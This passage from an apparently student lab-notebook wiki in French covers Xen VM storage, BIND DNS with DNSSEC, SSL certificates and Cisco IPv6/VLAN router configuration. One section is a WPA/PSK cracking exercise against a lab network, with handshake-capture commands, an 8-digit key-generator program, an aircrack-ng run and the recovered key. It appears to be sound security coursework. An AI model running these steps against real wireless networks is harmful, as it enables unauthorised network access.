Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
